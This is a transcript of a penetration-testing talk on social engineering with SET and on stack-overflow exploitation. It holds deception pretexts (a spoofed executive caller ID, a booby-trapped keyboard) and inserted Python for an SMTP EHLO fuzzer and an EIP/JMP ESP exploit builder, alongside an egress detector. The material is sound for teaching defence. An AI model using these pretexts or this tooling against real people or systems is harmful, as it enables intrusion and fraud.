Hacking the Perimeter

Page 1: Hacking the Perimeter

Social-Engineering Hacking your perimeter….

Not everyone needs to use zero days…

David Kennedy (ReL1K)

http://www.secmaniac.com Twitter: Dave_ReL1K

Page 2: Hacking the Perimeter

About the speaker

•  Wrote the Social-Engineer Toolkit (SET), Member of the Social-Engineer.org podcast, contributor to Back|Track, Metasploit, etc.

•  Director of Information Security for a Fortune 1000

•  Penetration testing and exploit focus

•  Worked for the US Marines, VP/Partner of an information security consulting firm.

Page 3: Hacking the Perimeter

Agenda

q Overview of perimeter security

q Main attack vectors utilized to compromise the perimeter

q Walkthrough of each attack vector

q Recommendations and conclusions

Page 4: Hacking the Perimeter

Overview

q Security is getting better. It is harder to find traditional vanilla attack vectors.

q Hackers adapt and overcome the controls and technology put in place.

q We’ll talk about social-engineering and the zero-day angle, but there’s still a ton of companies out there that do horribly when it comes to security.

Page 5: Hacking the Perimeter

Hacking your Perimeter

q Traditional attack methods don’t work

q You’ve undergone several dozen penetration tests and vulnerability scans

q You have a security team and a functioning security program

q You have anti-virus, HIPS, IPS, IDS, heuristics, and behavioral detection and prevention capabilities.

Page 6: Hacking the Perimeter

Perimeter Hacking Options

q Social-Engineering and Physical attack vectors – Probably our most preferred

q Zero-Day Angle – Crafting an exploit from your target

Page 7: Hacking the Perimeter

Social-Engineering and Security

•  Why fight your:

•  SIEM
•  Anti-Virus
•  HIPS/NIPS/IPS/IDS
•  Web Application Firewall
•  Secure Coding Practices
•  Patch Management

Why fight everything you’ve built your entire security program on?

Page 8: Hacking the Perimeter

It’s increasingly harder to break in on the external perimeter, so attackers adapt and go for our weakest link: the human element.

Page 9: Hacking the Perimeter

The easiest way in

•  It usually takes me a week of steady fuzzing and reversing to find a zero-day and craft a reliable exploit.

•  It takes me a day to get access to the internal network from social-engineering.

Page 10: Hacking the Perimeter

It’s not just us doing this…

•  The security community revolves around real-world attacks.

•  We are protecting against attacks out in the wild; hackers use social-engineering on a regular basis.

•  State-sponsored attacks are the largest threat out there today. A country that has 10,000 people dedicated to hacking can’t be good..

Page 11: Hacking the Perimeter

State-Sponsored Attacks

q Big increase in targeted attacks against organizations, in an effort to steal intellectual property or for financial motivations.

q Focused attacks that utilize specialized techniques are difficult to protect against.

Page 12: Hacking the Perimeter

Which country is the worst?

•  Well… Working with government agencies I really can’t say…

Page 13: Hacking the Perimeter

Completely unrelated slide

Page 14: Hacking the Perimeter

Why should they care?

•  No repercussions (except from Google), almost untraceable, and cheap.

•  Why build a new industry when you can take it?

Page 15: Hacking the Perimeter

Couple SE favorites

•  Pretexting is your hack: what you’re going to do during your social-engineering attack.

•  Neuro-Linguistic Programming (NLP) – How we think as humans

Page 16: Hacking the Perimeter

Steps of Anchoring

•  Establishing an Anchor – Triggering the stimulus that will become your anchor, for example talking frantically and sounding in need of help.

•  Firing your Anchor (also known as Activating) – You’ve triggered a feeling in the victim: you need help. Now you ask for that help.

Page 17: Hacking the Perimeter

So why use SE?

•  We’re lazy, we go for the easiest route.

Page 18: Hacking the Perimeter
Page 19: Hacking the Perimeter

Basics of SET

•  Open-source, purely Python-driven.

•  SET utilizes Metasploit both as the exploit repository for client-side attacks and for payloads.

•  Multiple attack vectors specifically designed for social-engineering.

•  Has become the standard for social-engineering in penetration tests across the world.

Page 20: Hacking the Perimeter

SET Attack Vectors

•  Spear-Phishing – Spoof or utilize already established email addresses to do spear-phishing attacks with file-format attack vectors.

•  Web Attacks – Multiple attack vectors including java applet, client-side exploits, tabnabbing, man left in the middle, and the credential harvester.

•  Malicious USB/DVD/CD – Autorun creation; allows you to deploy MSF payloads in a simple autorun.

Page 21: Hacking the Perimeter

SET Attack Vectors Cont.

•  Arduino / Teensy USB HID Attack Vector – Multiple payload selection for the USB keyboard HID attacks.

Page 22: Hacking the Perimeter

Scenario 1 - USB HID Attack Vector

•  Send an employee a brand new keyboard with all of the great bells and whistles, with a letter on company letterhead saying we’re doing updates to keyboards.

•  The employee plugs in the device; motion sensors detect whether the user is at the system or not. The mouse is moved 1 pixel every 3 minutes to ensure the screen is not locked.

Page 23: Hacking the Perimeter

DEMO

Page 24: Hacking the Perimeter

The keyboard attack

•  Needs no autorun at all: the device enumerates as a keyboard and types its commands, so disabling autorun does not stop it from executing arbitrary code on the system.

•  Can drop malicious binaries, trigger overflows, utilize downloaders, implant keystroke loggers, or backdoor your stuff.

•  Easily hidden in peripheral devices like docking stations, mice, keyboards, computers, USB thumb drives, and much more…

Page 25: Hacking the Perimeter

Integrating into Existing Hardware

•  Most new keyboards have integrated USB Hubs.

Page 26: Hacking the Perimeter

Motion Sensor capabilities (thanks Garland)

Page 27: Hacking the Perimeter

Scenario 2 - Java Applet Attack

•  You perform recon on the company you’re targeting. You learn their lingo, their structure, harvest email addresses, you know your pretext.

•  You register a domain name similar to your victim’s.

•  You call up the sales department claiming to be a customer that is experiencing issues connecting to your new company site.

Page 28: Hacking the Perimeter

DEMO

Page 29: Hacking the Perimeter

Thomas Werth Attack Vector

•  Released at ShmooCon, this attack vector allows you to create a malicious Java applet.

•  The user hits “Run” and the payload is executed on the victim’s machine.

•  Redirects the user back to the original site to make the attack less conspicuous.

•  Heavy obfuscation of the Java and the payload for A/V bypass, and fixed major issues with Linux/OS X payload deployment. Applet source just opened today!

Page 30: Hacking the Perimeter

DEMO

Page 31: Hacking the Perimeter

Multi Attack

•  You want to build the best possible pretext and ensure that if one option fails, there are multiple redundancies within the attack to ensure success rates.

•  You call the IT Help Desk claiming to be a high-level employee that is having issues getting to a mission-critical website. You spoof your source number to come from the executive’s phone number.

Page 32: Hacking the Perimeter

DEMO

Page 33: Hacking the Perimeter

The Multi-Attack Vector

•  As you can see, this attack vector has multiple attacks built into one website.

•  Ability to have failover in case one attack option is not successful.

•  Utilizes a combination of harvester, java applet, and client-side exploits in order to compromise the victim.

Page 34: Hacking the Perimeter

Why is it effective?

•  We are humans, we are programmed from birth through our lives to act and behave a certain way.

•  Our brains all work the same way, we are all vulnerable and there really is no patch.

Page 35: Hacking the Perimeter

So why use SET?

•  The threat is real.

•  This isn’t FUD or overhyped stuff.

•  It has to be incorporated into your normal penetration testing methodologies.

•  It tests your security controls and information security awareness program, and how effectively you can stop these types of attacks.

Page 36: Hacking the Perimeter

Zero-Days

q A zero-day is a vulnerability (and the exploit for it) that the vendor does not know about, so no patch exists for it yet.

q Zero days are out there; they aren’t public and they can be around for years without being released.

q Adobe has lately been getting hit, it seems, almost every week with a new zero-day.

q Zero days are extremely difficult to detect or prevent against: signatures and patches only cover what is already known.

Page 37: Hacking the Perimeter

Scenario 1

q You’re performing a penetration test for CompanyXYZ. You have exhausted all manual efforts and have found no viable attack method through the perimeter.

q Web applications are solid and have no apparent vulnerability.

q The ‘zero-day’ angle is your only option to gain access to the systems.

Page 38: Hacking the Perimeter

An introduction into ‘Fuzzing’

q Brute-force method of bug hunting.

q Sends malformed or oversized input (random commands, growing buffers) in the hope of a crash.

q Buffer length = 50, you send 51: an input one byte longer than the buffer that holds it is the simplest crash case.

Page 39: Hacking the Perimeter

Precursor

q The example you are about to see is a basic stack overflow and is as easy as it gets.

q There are several different types of overflows and different ways of exploiting them.

q We’ll talk shortly about Windows protection mechanisms; in this scenario they are disabled.

Page 40: Hacking the Perimeter

Buffer Overflow Example

q The SMTP server is susceptible to a stack-based overflow in the “EHLO” parameter.

q Sending 6000 “\x41” bytes (ASCII ‘A’) as the EHLO argument crashes the server.

q An attacker now knows that a vulnerability is here and, with further research (finding the offset to the return address and a usable jump), can exploit it.
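The fuzzing loop the two slides above describe (growing EHLO arguments until the server stops answering), as an added example rather than code from the talk or from SET. It assumes a plain-SMTP target on TCP 25 where a dropped connection or missing reply is the crash indicator, and it ships with a constructed stand-in for the vulnerable server (one that "dies" above a 5000-byte argument) so the loop runs offline; the host, port and the 5000-byte limit are assumptions, not values from the talk.

```python
"""
Added example (not from the talk or from SET): a minimal SMTP "EHLO"
fuzzer in the spirit of slide 38, plus a constructed stand-in for the
server so the loop can be run offline.

Assumptions (not in the original):
  * the target speaks plain SMTP on TCP 25 and crashes somewhere before
    an argument length of ~6000 bytes, as on slide 40;
  * a crash shows up as the connection being dropped (EOF / reset) or no
    reply coming back for the test case.
"""
import socket
from typing import Callable, Optional

BANNER_TIMEOUT = 5.0


def ehlo_case(length: int, filler: bytes = b"A") -> bytes:
    """One EHLO test case with an argument of the requested length ("\\x41" * n)."""
    return b"EHLO " + filler * length + b"\r\n"


def lengths(start: int = 100, stop: int = 6000, step: int = 100):
    """Buffer lengths to try, growing by `step` so the crash boundary gets bracketed."""
    return range(start, stop + step, step)


def send_over_tcp(host: str, port: int, payload: bytes) -> Optional[bytes]:
    """Real transport: connect, read the banner, send the case, return the reply.
    None means the server went away, which we treat as a crash indicator."""
    try:
        with socket.create_connection((host, port), timeout=BANNER_TIMEOUT) as s:
            s.settimeout(BANNER_TIMEOUT)
            s.recv(1024)              # banner, e.g. "220 mail.example.test ESMTP"
            s.sendall(payload)
            reply = s.recv(1024)
            return reply or None      # b"" means the peer closed on us: probable crash
    except (ConnectionError, socket.timeout, OSError):
        return None


def fuzz_ehlo(transport: Callable[[bytes], Optional[bytes]],
              start: int = 100, stop: int = 6000, step: int = 100) -> Optional[int]:
    """Send growing EHLO arguments until the transport reports no reply.
    Returns the first length that produced no reply, or None if every case survived.
    A 500/501 reply means the server rejected the command gracefully; keep going."""
    for n in lengths(start, stop, step):
        if transport(ehlo_case(n)) is None:
            return n
    return None


def fake_vulnerable_server(limit: int = 5000) -> Callable[[bytes], Optional[bytes]]:
    """Constructed stand-in for the target: its EHLO handler copies the argument
    into a `limit`-byte stack buffer, so anything longer "crashes" (no reply)."""
    def transport(payload: bytes) -> Optional[bytes]:
        if not payload.startswith(b"EHLO "):
            return b"500 5.5.1 Command unrecognized\r\n"
        arg = payload[5:].rstrip(b"\r\n")
        if len(arg) > limit:
            return None               # simulated crash / dropped connection
        return b"250 mail.example.test Hello\r\n"
    return transport


if __name__ == "__main__":
    print("first length with no reply:", fuzz_ehlo(fake_vulnerable_server()))
    # Against a real host (assumed address) the transport would be:
    # fuzz_ehlo(lambda p: send_over_tcp("10.0.0.5", 25, p))
```

The step size is the trade-off: a coarse step finds the crash quickly, then you re-run with a smaller step between the last good and first bad length to pin down the boundary before moving on to offset finding.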

Page 41: Hacking the Perimeter

Some Basic Instructions to be aware of

q JMP – Jump <address> (continue execution at that instruction)

q EIP – Instruction Pointer (the address of the next instruction to run; we take control of it by overwriting the saved return address on the stack)

q ESP – Stack Pointer (the top of the stack; after the function returns it points just past our overwritten return address, i.e. at the rest of our buffer)

q NOP – No operation (do nothing; opcode 0x90)

q NOP Slide – Multiple NOPs that create a slide effect: execution can land anywhere in them and runs down into the shellcode
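The next step after a confirmed crash, as an added example (not the talk's or Metasploit's own code, although the cyclic pattern imitates what Metasploit's pattern_create/pattern_offset do): find the offset to EIP from a cyclic pattern, then lay the EHLO argument out exactly as the slides describe, filler up to the saved return address, the address of a JMP ESP, a NOP sled and the shellcode, and check it for the bytes SMTP would mangle. The JMP ESP address, the EIP value "read from the debugger", the INT3 stand-in shellcode and the NUL/CR/LF bad-character set are assumptions for illustration.

```python
"""
Added example, not code from the talk: the pieces an exploit writer lines
up once the EHLO crash is confirmed. Everything runs offline; the JMP ESP
address, the EIP offset and the shellcode bytes are placeholders
(assumptions), not values from any real server.
"""
import string
import struct

# Bytes the SMTP parser would mangle before they reach the stack: NUL ends
# C strings, CR/LF ends the command line. Assumed bad-char set for SMTP.
BAD_CHARS = b"\x00\x0a\x0d"


def pattern_create(length: int) -> bytes:
    """Cyclic pattern (Aa0Aa1Aa2...), the same idea as Metasploit's pattern_create:
    every 4-byte window is unique, so the bytes that land in EIP give the offset."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes not supported")


def pattern_offset(eip_value: int, length: int = 20280) -> int:
    """Given the EIP value shown by the debugger, return the offset of those
    4 bytes (little-endian) inside the pattern, or -1 if they are not in it."""
    return pattern_create(length).find(struct.pack("<I", eip_value))


def nop_sled(n: int) -> bytes:
    return b"\x90" * n


def check_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list:
    """(offset, byte) pairs for every disallowed byte in `data`."""
    return [(i, data[i]) for i in range(len(data)) if data[i] in bad]


def build_ehlo_exploit(eip_offset: int, jmp_esp: int, shellcode: bytes,
                       sled_len: int = 16, total_len: int = 6000) -> bytes:
    """Lay out the EHLO argument as the talk describes:
       [ filler up to EIP ][ addr of JMP ESP ][ NOP sled ][ shellcode ][ pad ]
    When the overwritten return address is popped, execution goes to JMP ESP;
    ESP then points just past the saved EIP, i.e. at the sled, which slides
    into the shellcode. The buffer is padded to the length that crashed."""
    ret = struct.pack("<I", jmp_esp)
    payload = b"A" * eip_offset + ret + nop_sled(sled_len) + shellcode
    if len(payload) > total_len:
        raise ValueError("payload does not fit in the crash length")
    payload += b"C" * (total_len - len(payload))
    bad = check_bad_chars(payload)
    if bad:
        raise ValueError(f"bad chars at {bad[:5]}: re-encode or pick another address")
    return b"EHLO " + payload + b"\r\n"


# Constructed stand-ins: INT3s in place of real shellcode (break into the
# debugger when reached) and an assumed address in a non-ASLR module that
# contains FF E4 (JMP ESP). Neither value comes from the talk.
DEMO_SHELLCODE = b"\xcc" * 32
DEMO_JMP_ESP = 0x7C8369F0

if __name__ == "__main__":
    # 1. Crash the service with a cyclic pattern; suppose the debugger
    #    then shows EIP = 0x39654138 (assumed value).
    off = pattern_offset(0x39654138)
    print("offset to EIP:", off)
    # 2. Build the real buffer around that offset.
    buf = build_ehlo_exploit(off, DEMO_JMP_ESP, DEMO_SHELLCODE)
    print("exploit length:", len(buf))
```

The bad-character check is the part people skip and then lose a day to: a JMP ESP address containing 0x0a or 0x00 never reaches the stack intact over SMTP, so the address and the encoded payload are both filtered before anything is sent.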

Page 42: Hacking the Perimeter

How Windows is setup…


Page 43: Hacking the Perimeter

Before


Page 44: Hacking the Perimeter

After


Page 45: Hacking the Perimeter

Windows Protection Mechanisms

q Data Execution Prevention (DEP) – In this attack, if DEP were enabled the stack would be marked non-executable and the jump into our shellcode would fail.

q Stack Canaries (/GS) – A random cookie value is placed between the local buffers and the saved return address and checked before the function returns, to ensure stack integrity.

q Address Space Layout Randomization (ASLR) – Randomizes where modules are loaded; on 32-bit Windows only the high 2 bytes of a module’s base address change (the low 16 bits stay fixed), so a hard-coded “JMP ESP” address no longer works.

Page 46: Hacking the Perimeter

Defeating Data Execution Prevention (DEP) (and ASLR)

q Return-to-libc style attack using Return Oriented Programming (ROP): instead of executing our own bytes on the stack, we return into code that is already executable. When the gadgets come from a module that is not randomized, or we have an address leak, this sidesteps ASLR too.

q Remember when we inserted a “JMP ESP” instruction? With DEP the stack is non-executable, so instead we chain “gadgets” (short instruction sequences ending in RET that already exist in the loaded modules) to build our attack and set the stack up as a call to the WriteProcessMemory function.

q WriteProcessMemory copies our shellcode from the stack into memory that is already executable (for example a code cave in a loaded module’s code section; the API takes care of the page protection for the copy), and the chain then returns into the copy.

Page 47: Hacking the Perimeter

Protecting Against Overflows

q Third-party closed-source applications are tough. Having a mature third-party application security review process is critical.

q Internally developed software needs to undergo rigorous testing and source code analysis to ensure overflows are mitigated before reaching production.

q Have a team dedicated to researching zero-day-based threats and to detecting these types of attacks when they occur.

Page 48: Hacking the Perimeter

Minimizing Zero-Day Damage

q When utilizing overflows, generally a reverse connection (the compromised server connecting back out to the attacker) is needed.

q Ensure tight egress filtering is in place and that servers can only connect to what is absolutely necessary on the Internet.

q With proper controls in place, even a successful zero-day does limited damage.
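One way to check the egress point above from the defender's side, as an added example that is not part of the talk: parse netfilter-style firewall log lines for connections leaving the server subnet and flag any that are not on a short allowlist, which is what a reverse-connect payload's callback looks like from the network's point of view. The subnet, the allowlist entries, the log format and the log lines are all constructed for the example.

```python
"""
Added example (not from the talk): flag outbound connections from the
server tier that are not on the egress allowlist. Log format, subnet,
allowlist and sample lines are all assumptions constructed for this demo.
"""
import ipaddress
import re
from typing import List, Optional, Tuple

# Assumed server subnet and the only destinations servers legitimately need.
SERVER_NET = ipaddress.ip_network("10.10.0.0/24")
ALLOW = [
    (ipaddress.ip_network("10.0.0.53/32"), "udp", 53),    # internal resolver (hypothetical)
    (ipaddress.ip_network("10.0.0.123/32"), "udp", 123),  # internal NTP (hypothetical)
    (ipaddress.ip_network("10.0.0.80/32"), "tcp", 3128),  # outbound web proxy (hypothetical)
    (ipaddress.ip_network("10.10.0.0/24"), "tcp", 25),    # relay within the mail tier
]

# netfilter "LOG" target style fields; only the ones needed are captured.
LINE_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\w+)"
    r"(?: SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+))?"
)

Event = Tuple[str, str, str, Optional[int]]   # (src, dst, proto, dport)


def parse_line(line: str) -> Optional[dict]:
    """Extract src, dst, proto and destination port; None for lines we don't understand."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return {
        "src": ipaddress.ip_address(m["src"]),
        "dst": ipaddress.ip_address(m["dst"]),
        "proto": m["proto"].lower(),
        "dpt": int(m["dpt"]) if m["dpt"] else None,
    }


def is_allowed(ev: dict) -> bool:
    """True when destination, protocol and port match an allowlist entry."""
    return any(ev["dst"] in net and ev["proto"] == proto and ev["dpt"] == port
               for net, proto, port in ALLOW)


def unexpected_egress(lines: List[str]) -> List[Event]:
    """Connections from SERVER_NET that are not allowlisted, e.g. a reverse
    shell calling home on 4444 or a direct-to-Internet HTTPS that bypasses the proxy."""
    hits: List[Event] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["src"] not in SERVER_NET:
            continue            # noise, or a workstation: out of scope for this rule
        if not is_allowed(ev):
            hits.append((str(ev["src"]), str(ev["dst"]), ev["proto"], ev["dpt"]))
    return hits


# Constructed sample log (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = [
    "Jun 12 10:31:04 mx1 kernel: EGRESS: IN= OUT=eth0 SRC=10.10.0.5 DST=10.0.0.53 LEN=64 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=UDP SPT=51234 DPT=53 LEN=44",
    "Jun 12 10:31:09 mx1 kernel: EGRESS: IN= OUT=eth0 SRC=10.10.0.5 DST=203.0.113.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=2 DF PROTO=TCP SPT=49213 DPT=4444 WINDOW=29200 RES=0x00 SYN URGP=0",
    "Jun 12 10:32:41 web1 kernel: EGRESS: IN= OUT=eth0 SRC=10.10.0.7 DST=10.0.0.80 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=3 DF PROTO=TCP SPT=40001 DPT=3128 WINDOW=29200 RES=0x00 SYN URGP=0",
    "Jun 12 10:32:42 web1 kernel: EGRESS: IN= OUT=eth0 SRC=10.10.0.7 DST=198.51.100.9 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=4 DF PROTO=TCP SPT=40002 DPT=443 WINDOW=29200 RES=0x00 SYN URGP=0",
    "Jun 12 10:33:00 ws22 kernel: EGRESS: IN= OUT=eth0 SRC=192.168.1.20 DST=203.0.113.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=5 DF PROTO=TCP SPT=50000 DPT=4444 WINDOW=29200 RES=0x00 SYN URGP=0",
]

if __name__ == "__main__":
    for src, dst, proto, dpt in unexpected_egress(SAMPLE_LOG):
        print(f"ALERT server {src} -> {dst} {proto}/{dpt} not on egress allowlist")
```

The rule is deliberately a default-deny: the allowlist is the same short list the firewall should be enforcing, so anything this reports is either a gap in the firewall policy or a server that has started talking to something it never needed to.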

Page 49: Hacking the Perimeter

Traditional Pentests are Dead

Page 50: Hacking the Perimeter

Out of scope..

•  Businesses don’t understand what a true penetration test represents.

•  No solid framework, not all of us get to do fun stuff like this…

•  Things are taken out of scope, and there’s limited budget..

Page 51: Hacking the Perimeter

Where we need to go…

Page 52: Hacking the Perimeter

If you aren’t doing this…

•  If you aren’t doing SE as a part of your regular penetration tests you are seriously missing out.

•  If you don’t know about this, you should learn…

•  Success ratios for compromise with SET are estimated at around 94%.

Page 53: Hacking the Perimeter

Learning more about SE

•  http://www.social-engineer.org - Created by Chris Hadnagy (loganWHD) , great reference for Social-Engineering

Page 54: Hacking the Perimeter

Questions?

[email protected] Twitter: Dave_ReL1K